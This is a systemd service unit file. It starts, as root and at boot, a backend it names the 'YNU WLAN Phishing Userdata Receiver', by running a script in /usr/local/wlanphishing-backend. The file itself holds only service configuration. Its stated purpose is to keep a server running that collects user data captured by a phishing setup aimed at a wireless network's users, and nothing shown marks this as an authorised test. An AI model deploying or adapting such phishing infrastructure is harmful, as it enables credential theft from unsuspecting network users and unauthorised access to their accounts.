[Unit]
Description=YNU WLAN Phishing Userdata Receiver Backend
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
Restart=on-abnormal
RestartSec=30
StartLimitBurst=10
StartLimitIntervalSec=14400
User=root
Group=root
ExecStart=/bin/bash /usr/local/wlanphishing-backend/run_as_serv.sh
ExecStop=/bin/kill -9 $MAINPID

[Install]
WantedBy=multi-user.target
